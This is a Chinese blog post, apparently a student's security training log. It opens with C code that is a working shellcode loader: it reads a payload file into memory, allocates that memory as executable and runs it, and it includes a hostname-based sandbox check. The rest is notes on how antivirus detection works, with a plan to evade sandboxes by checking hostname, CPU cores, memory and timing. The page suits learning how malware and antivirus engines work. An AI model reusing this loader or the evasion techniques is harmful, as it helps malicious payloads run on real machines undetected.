【实训日志】7.14 日志

最新推荐文章于 2024-10-24 18:06:53 发布
最新推荐文章于 2024-10-24 18:06:53 发布
阅读量323 收藏 9
点赞数 3
分类专栏: 日志 文章标签: 单片机 嵌入式硬件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63576567/article/details/140417069
版权

目录

# 一. Vs2022 下学习 windowapi(应用程序接口)的使用

# 二. 杀软介绍

##2.1杀软与特征检测

###2.1.1 杀软的属性:

###2.1.2 杀软的引擎:

###2.1.3 静态查杀

###2.1.4文件报毒的情况

###2.1.5 动态监控(行为检测):

###2.1.6 特征库识别性的二进制片段

# 一. Vs2022 下学习 windowapi(应用程序接口)的使用

#include<windows.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>

#pragma warning(disable:4996)
/*
	要求1 单步调试 并处理所有的错误语法 最终程序运行结果是弹窗一个弹窗
	要求2 对GetHostName函数进行改造 hostName改为二级指针的方式传递
	要求3 对GetHostName函数进行改造 hostName作为返回值 传入方式为1级指针
*/

BOOL GetHostName(CHAR* hostName)
{
	DWORD hostNameLen = sizeof(hostName);
	if (!GetComputerNameA(hostName, &hostNameLen)) // GetComputerNameA是win32 的api 获取电脑hostname 第一个参数为存放hostname的内存缓冲区 第二个参数为缓冲区大小的地址
	{
		return FALSE;
	}
	return TRUE;
}

BOOL CheckIsSandbox()
{
	CHAR hostName[MAX_PATH] = { 0 };
	CHAR* sandboxName = "sandbox";

	if (!GetHostName(hostName))
		return FALSE;

	if (!strstr(hostName, sandboxName))
	{
		printf("%s\n", "not in sandbox");
		return TRUE;
	}
	return FALSE;
}

BOOL ReadPayload(char** shellcodeBuffer, PDWORD shellcodeSize)
{
	FILE* file = { 0 };
	CHAR* buffer = NULL;
	SIZE_T file_size = { 0 };

	file = fopen("box.dll", "rb");    // 打开文件
	if (file == NULL) {
		perror("Error opening file");
		return FALSE;
	}

	fseek(file, 0, SEEK_END);  // 获取文件大小
	file_size = ftell(file);
	rewind(file);

	buffer = (char*)calloc(file_size, 1);
	if (buffer == NULL) {
		perror("Memory allocation error");
		fclose(file);
		return FALSE;
	}

	fread(buffer, sizeof(char), file_size, file);    // 将读取文件内容到内存拷贝到我们申请的内存中
	*shellcodeBuffer = buffer;
	*shellcodeSize = (DWORD)file_size;

	fclose(file);// 关闭文件
	return TRUE;
}

BOOL ExecShellcode(char* shellcode, DWORD shellcodeSize)
{
	PVOID* shellcodeBuffer = NULL;
	if (shellcodeSize == 0)
	{
		printf("Invalid shellCode length\n");
		return FALSE;
	}
	//malloc(申请空间),calloc(申请的内存空间不能执行),virtualAlloc(),HeapAlloc()
	shellcodeBuffer = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(shellcodeBuffer, shellcode, shellcodeSize);
	((void(*)())shellcodeBuffer)();
	return TRUE;
}

int main()
{

	{
		CHAR* shellcodeBuffer = NULL;
		DWORD shellcodeSize = 0;
		if (!ReadPayload(&shellcodeBuffer, &shellcodeSize))
			return 1;
		ExecShellcode(shellcodeBuffer, shellcodeSize);
	}
	return 0;
}

运行截图:

# 二. 杀软介绍

##2.1杀软与特征检测

###2.1.1 杀软的属性:

1.指定查杀〔给定对象,检测是否含有恶意代码) 

⒉.能识别恶意代码的类型

3.宏病毒,感染型的病毒,能将病毒从宿主程序剥离杀软的引擎

###2.1.2 杀软的引擎:

1.分析模块(数据格式的识别)

⒉.特征库(hash值,md5值)

3.扫描核心。

###2.1.3 静态查杀

1.特征码识别(hash,文件名,函数名,字符串)

2.云查杀(上传到云端进行检测)

3.校验和(特征码检测的一种)

4.启发式(QVM)

5.Yara规则

###2.1.4文件报毒的情况

1.下载文件就报毒(肯定是静态)

2.文件落地不会报毒,但是双击运行报毒(动态)

动态查杀:沙箱检测:配合云传。

规避沙箱〔针对沙箱环境与正常环境的区别)写一份检测代码
检测一点(内存空间小,运行时间〈沙箱环境中,时间流速较快),主机名,CPU核心数,进程数量,io设备数量)

###2.1.5 动态监控(行为检测):

1.检测服务相关
2.检测注册表
3.敏感命令(netuser.whoami
4.网络请求
5.策略组
6.防火墙
7.windowsAPI

###2.1.6 特征库识别性的二进制片段

1.基于特征码进行检测:杀毒软什的病毒库记录了一些恶意软什的特征码,检测时提取特征码和库内做比对来判断.
2.利用启发式惠意软件检测;检测进程链.
3.基于特征码进行检测:杀毒软什的病毒库记录了一些恶意软什的特征码,检测时提取特征码和库内做比对来判断.
###2.1.7 安全卫士360(无核晶)360的六大引擎
360云查杀引擎、
360启发式引擎、
QEX脚本查杀引擎、
QVMII人工智能引擎、
鲲鹏引擎、
反勒索引擎特征检测:安全云大脑(360主要检测手段)

今夕 是何年
关注
专栏目录
Java进阶(持续更新中...)-2020-12-08
qq_40239245的博客
12-08 493
Java进阶(持续更新中…) 第一周计划及实践 12.1-12.06: 12.2 平台中间层接口聚合基于响应式的数据处理与接口并发 12.3 优化聚合接口,测试retry,onErrorReteturn,doOnError等功能,测试对比接口性能; 12.4 聚合接口测试,性能问题排查:日志输出,ssl-shakehands极限;线程调度问题; 12.5 反应式log关闭,线程调度问题处理 12.6 切面编程,类定义测试;入参验证validator验证问题 第四周计划及实践 11.23-11.29: 11.
暑期项目实训日志7.14——学习知识汇聚平台设计与实现
lovebigdata的博客
07-14 116
今天群里的讨论依然很多,也更细化了,也有队员提出了不一样的意见。今天继续测试平台的一些功能
山东大学软件学院暑期项目实训日志(九)
csc_wyy的博客
07-15 143
7.14 今天是7月14日,下午组长组织我们召开了一次腾讯会议,在会议上我们一起商讨了有关第二次迭代开发需要实现的相关功能。经过一个多小时的讨论,我们初步达成了一致,如果在实际开发过程中遇到什么困难的话,再召开会议讨论集中解决。 7.15 今天是7月15日,昨天组长在群里发了配置前后端环境的指导手册,有我之前已经配置好了前端的环境,目前只需要配置后端的TensorFlow库和Diango,在今天的配置过程中,遇到了一些小问题,但是通过网上查阅资料最终得到了解决。 ...
暑期项目实训SaaS云服务系统开发—云会议系统—— 7.14二期开发需求分析,迭代了用户与企业相关接口
weixin_43735256的博客
07-18 180
本周需求分析1
操作系统-陈渝
参考答案开心否的博客
08-22 1926
视频链接:https://www.bilibili.com/video/BV1uW411f72n 下面是整理的笔记 第一章 操作系统的概述 1.1 操作系统的启动 用户角度:操作系统是一个控制软件 管理应用程序 为应用程序提供服务 杀死应用程序 资源管理 管理外设/分配资源 在操作系统下,进程<->CPU, 文件<->磁盘,地址空间<->内存。 操作系统的架构层次:硬件之上,应用软件之下(为应用软件提供服务支持)。 Linux,Windows界面属于外壳shel.
软件工程专业毕业实习(毕业实习、Java、微信小程序、千锋教育、开发环境、MySQL 数据库、Layui、HTML、CSS、Javascript、SpringBoot、Mybatis)
weixin_53323037的博客
08-01 1593
大四的上学期的前两周是毕业实习过程。第一周在学校进行了与java有关的基础,接下来的学习是去西安的千峰教育进行了一周的实习,在那里主要学习的内容是微信小程序的开发与设计。总之,巩固了java的基础知识,学习了微信小程序这个新的技能,学习的时间是短暂的,学习的成果却是巨大的,要每一分每一秒都要认真的学习,才能够跟的上,才能够更好的完成任务。2.实习单位介绍:我所在的实习单位是千锋教育,是一家专注于IT培训的公司。千锋教育成立于2006年,总部位于北京,并在全国多个城市设有分支机构。
【Linux专栏】Linux 常用文件管理命令(常用命令大全)
Newin2020的博客
02-06 1928
为 0 基础刚入门 Linux 的小伙伴整理的详细笔记,也欢迎大佬们一起交流~
总结——LR学习总结
weixin_33670786的博客
04-09 1853
2.1 web_submit_data页面提交数据项。输入框输入。使用用户名和密码进行登录用web_submit_data()函数提交表单数据:HTTP POST 请求,最常见的参数形式; Web_submit_form差不多。1) EXTRARES:在开始录制选项中,Toos—Recording Option下—Recording选项中,有一个Advanced HT...
【Web安全笔记】之【7.0 防御技术】
AA8j的博客
12-23 4372
文章目录7.0 防御技术7.1 团队建设7.1.1 人员分工1. 部门负责人2. 合规管理员3. 安全技术负责人4. 渗透/代码审计人员5. 安全设备运维人员6. 安全开发7.1.2 参考链接7.2 红蓝对抗7.2.1 概念7.2.3 网络攻防演习7.2.4 侧重7.2.5 目标7.2.6 前期准备7.2.7 行动流程7.2.8 注意事项7.2.9 参考链接7.3 安全开发7.3.1 简介7.3.2 步骤1) 阶段1:培训2) 阶段2:确定安全需求3) 阶段3:设计4) 阶段4:实现5) 阶段5:验证6)
elk7.14下载Elasticsearch kibana 7.14
09-20
Elasticsearch 7.14 下载 logstash-7.14.1 kibana-7.14.1 elastic-agent-7.14 filebeat-7.14 packetbeat-7.14 链接:https://pan.baidu.com/s/1pQQa6CUPtkmCtdA-XnbYyA
elasticsearch7.14
11-06
**Elasticsearch 7.14 在 Linux (CentOS) 上的安装与配置** Elasticsearch 是一个开源的全文搜索引擎,被广泛应用于日志分析、实时监控、数据搜索等领域。版本 7.14 提供了多项性能优化和新功能,以提升搜索效率和...
MCRInstaller 7.14.zip
05-28
**MCRInstaller 7.14.zip 知识点详解** **一、MCRInstaller介绍** MCR(Matlab Compiler Runtime)是MathWorks公司提供的一个独立的运行时环境,用于执行由MATLAB编译器生成的独立应用程序。MCRInstaller 7.14即为...
最新版 elasticsearch-analysis-ik-7.14.2.zip
09-24
《Elasticsearch Analysis IK插件7.14.2版本详解》 Elasticsearch是一款功能强大的开源全文搜索引擎,广泛应用于数据分析、日志收集、搜索服务等领域。为了更好地满足中文分词的需求,社区开发了名为“elastic...
最新版 elasticsearch-analysis-ik-7.14.1.zip
09-11
4. commons-logging-1.2.jar:Apache Commons Logging,一个轻量级的日志接口,允许用户选择自己的日志实现。 5. elasticsearch-analysis-ik-7.14.1.jar:IK 分词器的核心库,包含了所有必需的类和资源文件,用于在 ...
51单片机应用开发(进阶)---外部中断(按键+数码管显示0-F)
面包板扎的专栏
10-21 687
1、巩固数码管、外部中断知识2、具体实现:按键K4(INT1)每按一次,数码管从0依次递增显示至F,再按则循环显示。1.1 共阳数码管结构1.2 共阳数码管码表共阳不带小数点0-F段码为:{0xc0,0xf9,0xa4,0xb0,0x99,0x92,0x82,0xf8,0x80,0x90,0x88,0x83,0xc6,0xa1,0x86,0x8e}; 效果如下:器件: 数码管(共阳)7SEG-MPX1-CA、按键BUTTON
51单片机 复位电路
pengcheng2013的博客
10-22 252
如果电压一直没有拉为0v, 使用杜邦线,连接,另一头接地,电路就能复位了。上电复位是为了程序执行到后面,突然关机,能够让电路能够回到初始状况。电容上电有一个过程,充满电所需世界大于两个机器周期。电容电充满之后,电压拉为0v, 整个电路就复位了。按下手动复位按钮,大于两个机器周期就复位了。
【STM32】单片机ADC原理详解及应用编程
最新发布
m0_73931287的博客
10-24 1468
【STM32】单片机ADC原理详解及应用编程
基于单片机的短信火灾报警系统
weixin_45905610的博客
10-24 820
文中设计并实现了一种低成本、快速响应的基于单片机的火灾自动报警系统。使用温度传感器与烟雾传感器实现对火灾的探测。将STC12C5A60S2单片机作为系统的主要控制芯片,同时通过三极管蜂鸣器,使用串口控制手机模块以实现声光、短信报警功能。同时还设计有使用电源管理芯片实现的主备电源切换功能。
基于单片机的家用多功能衣柜控制系统设计
lantiandianzi的博客
10-22 218
本设计采用STM32F103C8T6作为主要控制单元,还包括温湿度传感器DHT11、电源转换电路、报警电路、OLED显示电路、按键电路、时钟电路、继电器控制电路等。上电后,系统初始化,按键设置报警阈值、温湿度阈值及时间阈值。各传感器采集信息后上传到主机,单片机通过程序的分析处理,将温湿度、时间以及系统运行模式和衣物推荐信息显示在OLED液晶显示屏上,当时间到达消毒时间时,进行消毒,消毒结束后蜂鸣器报警;当温湿度超过相应的阈值时,除湿干燥模块工作,直至温湿度低于阈值。
Windows平台Logstash 7.14.1版本发布
资源摘要信息:"最新版windows logstash-...综上所述,Windows平台上的Logstash-7.14.1版本是ELK技术栈中用于日志和数据处理的关键组件。通过合理的安装和配置,用户可以利用Logstash的强大功能来构建高效的数据管道。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值